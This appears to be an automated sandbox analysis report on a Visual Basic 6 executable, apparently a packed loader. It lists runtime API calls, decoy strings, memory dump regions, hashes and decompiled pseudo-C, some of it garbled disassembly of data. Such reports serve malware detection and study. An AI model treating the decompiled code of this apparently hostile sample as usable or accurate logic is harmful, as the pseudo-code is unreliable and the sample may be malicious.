__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000188), ref: 00418DE4
__vbaChkstk.MSVBVM60(?,00000003,?,?), ref: 00418E7C
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,00000710,?,?,00011141,?,?,00000003,?,?), ref: 00418EE8
__vbaVarMove.MSVBVM60(?,?,00011141,?,?,00000003,?,?), ref: 00418F05
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?,?,?,00011141,?,?,00000003,?,?), ref: 00418F33
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00418F4B
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00418F66
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418F9F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000070), ref: 00418FE6
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041900D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419049
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000108), ref: 00419093
__vbaStrCopy.MSVBVM60(00000000,?,0040A120,00000108), ref: 004190D2
__vbaFreeStr.MSVBVM60(?,00000008), ref: 00419102
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000008), ref: 00419114
__vbaFreeVar.MSVBVM60 ref: 00419122
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041913A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419173
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,000000F8), ref: 004191C0
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004191E5
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00419200
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041923C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000000F8), ref: 00419289
__vbaVarDup.MSVBVM60(00000000,?,0040A120,000000F8), ref: 0041931A
__vbaI4Var.MSVBVM60(?), ref: 00419326
__vbaChkstk.MSVBVM60(?,00000009,?,?), ref: 00419371
__vbaChkstk.MSVBVM60(?,00000009,?,?), ref: 00419385
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,00000714), ref: 004193EC
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041941D
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00419443
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041945E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419497
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000110), ref: 004194E4
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041950B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419547
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000050), ref: 0041958B
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 004195B2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004195EE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000000F8), ref: 00419638
__vbaStrMove.MSVBVM60(00000000,?,0040A214,000000F8), ref: 004196A5
__vbaFreeStr.MSVBVM60 ref: 004196EE
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00419707
__vbaFreeVar.MSVBVM60 ref: 00419715
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041972D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419766
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000178), ref: 004197B3
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000), ref: 004197D8
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 004197F3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041982F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000138), ref: 0041987C
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 004198A3
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004198DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000048), ref: 00419923
__vbaI4Var.MSVBVM60(00000008,?,?,?,Juhl,?,1AEA6F70,00005AFC,00000008,002FFCDD,06A14150,00005B07,?,?), ref: 004199D0
__vbaFreeObjList.MSVBVM60(00000004,?,?,00000000,?,?,?,?,Juhl,?,1AEA6F70,00005AFC,00000008,002FFCDD,06A14150,00005B07), ref: 00419A0A
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000008), ref: 00419A22
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EB0,000002B4), ref: 00419A5C
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 00419A83
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419ABC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000178), ref: 00419B09
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000), ref: 00419B2E
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,00407448,0041E010), ref: 00419B49
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419B85
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000138), ref: 00419BD2
__vbaNew2.MSVBVM60(00407448,0041E010,00000000,?,0040A120,00000138), ref: 00419BF9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00419C35
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000048), ref: 00419C79
__vbaI4Var.MSVBVM60(00000008,?,?,?,Juhl,?,1AEA6F70,00005AFC,00000008,002FFCDD,06A14150,00005B07,?,?), ref: 00419D26
__vbaFreeObjList.MSVBVM60(00000004,?,?,00000000,?,?,?,?,Juhl,?,1AEA6F70,00005AFC,00000008,002FFCDD,06A14150,00005B07), ref: 00419D60
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000008), ref: 00419D78
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,?,?,00407448,0041E010,?,?,00407448,0041E010), ref: 00419D93
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419DCC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000118), ref: 00419E19
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,000006FC), ref: 00419E85
__vbaFreeObj.MSVBVM60(00000000,00401198,00409EE0,000006FC), ref: 00419EA5
__vbaFreeVar.MSVBVM60(00000000,00401198,00409EE0,000006FC), ref: 00419EB0
__vbaNew2.MSVBVM60(00407448,0041E010,00000000,00401198,00409EE0,000006FC), ref: 00419EC8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419F01
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000110), ref: 00419F4E
__vbaNew2.MSVBVM60(00407448,0041E010,00000000,?,0040A120,00000110), ref: 00419F75
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419FB1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A120,00000050), ref: 00419FF5
__vbaNew2.MSVBVM60(00407448,0041E010,00000000,00000000,0040A120,00000050), ref: 0041A01C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041A058
__vbaHresultCheckObj.MSVBVM60(00000000,0041E010,0040A214,000000F8), ref: 0041A0A2
__vbaStrMove.MSVBVM60(00000000,0041E010,0040A214,000000F8), ref: 0041A10F
__vbaFreeStr.MSVBVM60 ref: 0041A158
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041A171
__vbaFreeVar.MSVBVM60 ref: 0041A17F
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041A197
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041A1D0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000170), ref: 0041A21A
__vbaNew2.MSVBVM60(00407448,0041E010,00000000,?,0040A0F4,00000170), ref: 0041A241
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041A27D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A120,00000138), ref: 0041A2CA
__vbaChkstk.MSVBVM60(?,00000000,?,?), ref: 0041A34F
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EE0,00000708), ref: 0041A3A5
__vbaFreeStr.MSVBVM60(00000000,00401198,00409EE0,00000708), ref: 0041A3C7
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041A3D9
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00409EB0,00000288), ref: 0041A42C
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000), ref: 0041A44E
__vbaI4Var.MSVBVM60(00000000), ref: 0041A457
__vbaFreeObj.MSVBVM60(00000000), ref: 0041A462
__vbaFreeVar.MSVBVM60(00000000), ref: 0041A46D
__vbaFreeVar.MSVBVM60(0041A516,00000000), ref: 0041A500
__vbaFreeVar.MSVBVM60(0041A516,00000000), ref: 0041A508
__vbaFreeVar.MSVBVM60(0041A516,00000000), ref: 0041A510

Strings

Ad, xrefs: 00419E2D
Unidyllic5, xrefs: 00418092
riges, xrefs: 00418645
Laquearian, xrefs: 00418885, 0041A2F6
euthanasy, xrefs: 004190CA
4_A, xrefs: 004184FB
Juhl, xrefs: 004199B3, 00419D09
UNMELANCHOLY, xrefs: 004192D2
Orthogenetic, xrefs: 004192FA
Pneumonoultramicroscopicsilicovolcanoconiosis, xrefs: 004192E6

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$List$Chkstk$Move$CallLate$Copy
String ID: Ad$4_A$Juhl$Laquearian$Orthogenetic$Pneumonoultramicroscopicsilicovolcanoconiosis$UNMELANCHOLY$Unidyllic5$euthanasy$riges
API String ID: 450282885-2911217071
Opcode ID: f7a48a71be69ef385adf4de828bfd6699afc5cc988cb0c7966c3a899efd83e71
Instruction ID: 00edbb0d1835defc0c83dc4aa62275ec4fa04f2e62c9015eeb7c3571286c9f19
Opcode Fuzzy Hash: f7a48a71be69ef385adf4de828bfd6699afc5cc988cb0c7966c3a899efd83e71
Instruction Fuzzy Hash: C3331875900228EFCB21DF50CC89BD9BBB8BB48304F1045EAE549BB2A1CB795AC4DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFDC, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041AFDC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v44;
				char _v60;
				char* _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				short _v144;
				short _t37;
				short _t40;
				void* _t52;
				void* _t54;
				intOrPtr _t55;

				_t55 = _t54 - 0xc;
				 *[fs:0x0] = _t55;
				L00401420();
				_v16 = _t55;
				_v12 = 0x401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t52);
				_v84 = L"8:8:8";
				_v92 = 8;
				L00401576();
				_push( &_v44);
				_push( &_v60); // executed
				L00401510(); // executed
				_v100 = 8;
				_v108 = 0x8002;
				_push( &_v60);
				_t37 =  &_v108;
				_push(_t37);
				L0040155E();
				_v144 = _t37;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L0040159A();
				_t40 = _v144;
				if(_t40 != 0) {
					_v84 = L"homalosternal";
					_v92 = 8;
					_v116 = 0xa0559;
					_v124 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t40 = 0x10;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"if1cT1244");
					_push(_v28);
					L0040150A();
				}
				_push(0x41b0fa);
				L004015A6();
				return _t40;
			}

0x0041afdf
0x0041afee
0x0041affa
0x0041b002
0x0041b005
0x0041b00c
0x0041b01b
0x0041b01e
0x0041b025
0x0041b032
0x0041b03a
0x0041b03e
0x0041b03f
0x0041b044
0x0041b04b
0x0041b055
0x0041b056
0x0041b059
0x0041b05a
0x0041b05f
0x0041b069
0x0041b06d
0x0041b06e
0x0041b070
0x0041b078
0x0041b081
0x0041b083
0x0041b08a
0x0041b091
0x0041b098
0x0041b09f
0x0041b0a2
0x0041b0ac
0x0041b0ad
0x0041b0ae
0x0041b0af
0x0041b0b2
0x0041b0b3
0x0041b0bd
0x0041b0be
0x0041b0bf
0x0041b0c0
0x0041b0c1
0x0041b0c3
0x0041b0c8
0x0041b0cb
0x0041b0d0
0x0041b0d3
0x0041b0f4
0x0041b0f9

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041AFFA
__vbaVarDup.MSVBVM60 ref: 0041B032
#543.MSVBVM60(?,?), ref: 0041B03F
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0041B05A
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0041B070
__vbaChkstk.MSVBVM60 ref: 0041B0A2
__vbaChkstk.MSVBVM60 ref: 0041B0B3
__vbaLateMemCall.MSVBVM60(?,if1cT1244,00000002), ref: 0041B0CB
__vbaFreeObj.MSVBVM60(0041B0FA,?,?,00401426), ref: 0041B0F4

Strings

homalosternal, xrefs: 0041B083
if1cT1244, xrefs: 0041B0C3
8:8:8, xrefs: 0041B01E

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$#543CallLateList
String ID: 8:8:8$homalosternal$if1cT1244
API String ID: 993874488-20235064
Opcode ID: dc5e0edb27eb57ea216ff5f34742edfca6d99bae1eb02535b5b347468c766793
Instruction ID: 6a5ee15f6c57cfb04e67907527f4af3bfafacdcaaa333c50b2c7ab55d70b62fe
Opcode Fuzzy Hash: dc5e0edb27eb57ea216ff5f34742edfca6d99bae1eb02535b5b347468c766793
Instruction Fuzzy Hash: D0212E71900208ABDB01EFD5C846BCEBFB9FF09704F50852AF501BF291DBB995898B95

Uniqueness

Uniqueness Score: -1.00%

Function 004015D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 61%

			_entry_() {
				signed char _t24;
				intOrPtr* _t26;
				signed int _t29;
				signed int _t30;
				signed char _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				signed int _t40;
				void* _t41;
				signed int _t48;
				intOrPtr _t54;

				_push("VB5!6&*"); // executed
				L004015D0(); // executed
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 ^ _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				_t25 = 0xd5;
				asm("fcomp qword [esi+eax*8]");
				_t32 = 0xa7;
				_t38 = _t37 - _t41;
				asm("invalid");
				 *0xd5 = 0xd5 +  *0xd5;
				 *0xd5 = 0xd5 +  *0xd5;
				 *0xd5 = 0xd5 +  *0xd5;
				 *0xd5 = 0xd5 +  *0xd5;
				 *0xd5 = 0xd5 +  *0xd5;
				asm("popad");
				if( *0xd5 < 0) {
					L10:
					asm("gs insb");
					_push(0x73736465);
					asm("outsb");
					 *[ss:0x53000b01] =  *[ss:0x53000b01] + _t32;
					_t54 =  *[ss:0x53000b01];
					if(_t54 == 0) {
						L14:
						 *_t25 =  *_t25;
						 *_t25 =  *_t25;
						L15:
						 *((intOrPtr*)(_t25 + 0x800080)) =  *((intOrPtr*)(_t25 + 0x800080)) + _t25;
						 *_t25 =  *_t25 + _t25;
						 *_t25 =  *_t25 + 0x80;
						 *((intOrPtr*)(_t25 - 0x3fffff80)) =  *((intOrPtr*)(_t25 - 0x3fffff80)) + _t25;
						asm("rol al, 0x0");
						asm("rcr ah, 0xc0");
						_t26 = _t25 + _t35;
						asm("retf 0xa6");
						asm("aam 0xf0");
						 *_t26 =  *_t26 + 1;
						 *_t26 =  *_t26 + 1;
						ss = _t41;
						goto __ebx;
					}
					if(_t54 == 0) {
						goto L15;
					}
					asm("arpl [edx+0x61], si");
					asm("o16 jz 0x36");
					 *_t32 =  *_t32 + _t30;
					 *_t25 =  *_t25 + _t25;
					_t35 = _t35 + 1;
					 *_t35 =  *_t35 + _t25;
					_t41 = _t41 +  *_t30;
					asm("invalid");
					 *_t25 =  *_t25 + _t25;
					asm("insb");
					if ( *_t25 == 0) goto L13;
					 *((intOrPtr*)(_t38 + 0xe)) =  *((intOrPtr*)(_t38 + 0xe)) + _t30;
					 *_t32 =  *_t32 + _t25;
					 *_t32 =  *_t32 + _t25;
					 *_t25 =  *_t25 + _t35;
					 *_t25 =  *_t25 ^ _t25;
					 *_t32 =  *_t32 + _t25;
					 *_t25 =  *_t25 + _t32;
					 *((intOrPtr*)(_t25 + 0x1600000e)) =  *((intOrPtr*)(_t25 + 0x1600000e)) + _t32;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t32;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t35;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 | _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t32 =  *_t32 + _t32;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t32 =  *_t32 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					 *_t25 =  *_t25 + _t25;
					goto L14;
				} else {
					_t40 =  *(_t36 + 0x6e) * 0x70726f43;
					asm("outsd");
					if(_t40 < 0) {
						L9:
						 *0xf =  *0xf + _t30;
						_push(cs);
						 *((intOrPtr*)(_t25 + 0x65)) =  *((intOrPtr*)(_t25 + 0x65)) + _t32;
						goto L10;
					}
					 *0xd5 = 0xd5 +  *0xd5;
					 *0xd5 = 0xd5 +  *0xd5;
					_t30 = _t30 + _t30;
					asm("int3");
					 *0xd5 =  *0xd5 ^ 0x000000d5;
					_t4 = _t36 - 0x5c;
					 *_t4 =  *(_t36 - 0x5c) | 0x000000d5;
					_t48 =  *_t4;
					asm("cld");
					if(_t48 < 0) {
						goto L1;
					}
					asm("aaa");
					if(_t48 == 0) {
						asm("adc edx, 0xacee40a");
						_push(_t36);
						_t32 = _t40 - 0x41;
						if(0xa7 == 0) {
							_t32 = 6;
							asm("bound edi, [edx]");
							_t36 = _t36 - 1;
							asm("lodsd");
							_t29 =  *0xba6b9014;
							asm("stosb");
							 *((intOrPtr*)(_t29 - 0x2d)) =  *((intOrPtr*)(_t29 - 0x2d)) + _t29;
							_t25 = _t30 ^  *0xFFFFFFFFB711CF6C;
							_t30 = _t29;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
							 *_t25 = 0xd5 +  *_t25;
						}
						 *_t25 =  *_t25 + _t25;
						 *_t25 =  *_t25 + _t25;
						 *_t25 =  *_t25 + _t25;
						 *_t25 =  *_t25 + _t25;
						 *_t25 =  *_t25 + _t25;
					}
					 *((intOrPtr*)(_t36 + 0x1d000010)) =  *((intOrPtr*)(_t36 + 0x1d000010)) + _t25;
					goto L9;
				}
				L1:
				 *0xd5 =  *0xd5 ^ _t35;
				_t25 = 0xd6;
				_t30 = _t30 + _t30;
			}

0x004015d8
0x004015dd
0x004015e2
0x004015e4
0x004015e6
0x004015e8
0x004015ea
0x004015ee
0x004015f0
0x004015f2
0x004015f4
0x004015f6
0x004015fc
0x004015fe
0x00401602
0x00401604
0x00401606
0x00401608
0x0040160a
0x0040160c
0x0040160e
0x0040160f
0x00401685
0x00401685
0x00401687
0x00401690
0x00401691
0x00401691
0x00401698
0x004016fb
0x004016fb
0x004016fe
0x00401701
0x00401701
0x00401707
0x00401709
0x0040170c
0x00401712
0x00401715
0x00401718
0x0040171a
0x0040171d
0x0040171f
0x00401723
0x00401725
0x00401727
0x00401727
0x0040169a
0x00000000
0x00000000
0x0040169c
0x0040169f
0x004016a2
0x004016a4
0x004016a6
0x004016a7
0x004016a9
0x004016ab
0x004016ad
0x004016af
0x004016b0
0x004016b2
0x004016b8
0x004016ba
0x004016bc
0x004016be
0x004016c0
0x004016c2
0x004016c4
0x004016ca
0x004016cc
0x004016ce
0x004016d0
0x004016d2
0x004016d4
0x004016d7
0x004016d9
0x004016db
0x004016dd
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016e9
0x004016eb
0x004016ed
0x004016ef
0x004016f1
0x004016f3
0x004016f5
0x004016f7
0x004016f9
0x00000000
0x00401611
0x00401611
0x00401618
0x00401619
0x0040167c
0x0040167c
0x00401682
0x00401683
0x00000000
0x00401683
0x0040161b
0x0040161d
0x0040161f
0x00401621
0x00401622
0x00401624
0x00401624
0x00401624
0x00401627
0x00401628
0x00000000
0x00000000
0x0040162a
0x0040162b
0x0040162d
0x00401635
0x00401636
0x00401639
0x00401642
0x00401644
0x00401646
0x00401647
0x0040164e
0x00401650
0x00401651
0x00401654
0x00401654
0x00401655
0x00401657
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401661
0x00401663
0x00401665
0x00401667
0x00401669
0x0040166b
0x0040166d
0x0040166d
0x0040166e
0x00401670
0x00401672
0x00401674
0x00401676
0x00401676
0x00401678
0x00000000
0x00401678
0x004015ae
0x004015ae
0x004015b0
0x004015b1

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015DD

Strings

VB5!6&*, xrefs: 004015D8

Memory Dump Source

Source File: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 5c9958a697ca91ad46afb291029fd8ea6f184b529199c72d055bd8916eb6dbcd
Instruction ID: 0b53c19f812d125679a924027d6536160ba1e8e69405f6f517ae6cf21e9a89de
Opcode Fuzzy Hash: 5c9958a697ca91ad46afb291029fd8ea6f184b529199c72d055bd8916eb6dbcd
Instruction Fuzzy Hash: E03112A644E7C15FD30397B49D262817FB0AF13214B4E45EBC481DF4E3D229194AD726

Uniqueness

Uniqueness Score: -1.00%

Function 02184F51, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

`, xrefs: 02185060

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: e8c098829875c1c180e7dfacdbaf2f4740cf08f35c42e06e3e9fc30ffcc915ec
Instruction ID: d9626b2bb7e0b329cf023874dba2ddedd51460daac35ed6c35a3e751a8b275c0
Opcode Fuzzy Hash: e8c098829875c1c180e7dfacdbaf2f4740cf08f35c42e06e3e9fc30ffcc915ec
Instruction Fuzzy Hash: 4321A060AD8287EDEE3D79A459D47BD2113AF92364FE3813BE87742044EF248184CE43

Uniqueness

Uniqueness Score: -1.00%

Function 0218084B, Relevance: 3.3, APIs: 2, Instructions: 314serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: cc76777fabfdd5659dbcbbd6f8a1b087748be4ba530222c6309b857aa9b5bdd8
Instruction ID: e01dbb74602fdb5bf11db946e0c0d13f1a0a99f6760d994d465b65d9bcc345cb
Opcode Fuzzy Hash: cc76777fabfdd5659dbcbbd6f8a1b087748be4ba530222c6309b857aa9b5bdd8
Instruction Fuzzy Hash: 8191AE349C434EAAEF383E2888E47FA26179F46354FA60229DCD6970C5DB69C4CDCE51

Uniqueness

Uniqueness Score: -1.00%

Function 02180860, Relevance: 3.3, APIs: 2, Instructions: 265serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 87b34bf4219484d59f8cfe390542bd36654e161a56193dabedce96a8b7454e44
Instruction ID: dbc36632e12d793d9f9e3b91ff89bd104391d184773304743f773764212fcf16
Opcode Fuzzy Hash: 87b34bf4219484d59f8cfe390542bd36654e161a56193dabedce96a8b7454e44
Instruction Fuzzy Hash: 30717C249C534EA9EF383D2849E47FE22278F463A4FA6422ADCD697085DB65C4CDCD42

Uniqueness

Uniqueness Score: -1.00%

Function 021808D2, Relevance: 3.3, APIs: 2, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9124fe435ff587c253f2250f91918c727c191079a31125d8db44cb379589091
Instruction ID: 37a4c68620aa91678f54dbaa3b45f182689124ea7abb951fdcb7c73802e4291c
Opcode Fuzzy Hash: d9124fe435ff587c253f2250f91918c727c191079a31125d8db44cb379589091
Instruction Fuzzy Hash: B771BD249C434EAAEF383E2849E47FA27178F46364FA6021EDCD6971C5DB65C48DCE41

Uniqueness

Uniqueness Score: -1.00%

Function 0218096F, Relevance: 3.2, APIs: 2, Instructions: 215serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 6be7111ea7b0345b79739d12bd6dc211665982d8cb33183ae96beee8a6150350
Instruction ID: d3d379d9451add31bb7c025dbf381dbfb3b9845c3683750b6cb8b1edabefe30b
Opcode Fuzzy Hash: 6be7111ea7b0345b79739d12bd6dc211665982d8cb33183ae96beee8a6150350
Instruction Fuzzy Hash: 72519D349C434D99EF383E2848E47FE22279F86364FA2421DDC96430C1D775C889CE42

Uniqueness

Uniqueness Score: -1.00%

Function 0218099D, Relevance: 3.2, APIs: 2, Instructions: 207serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

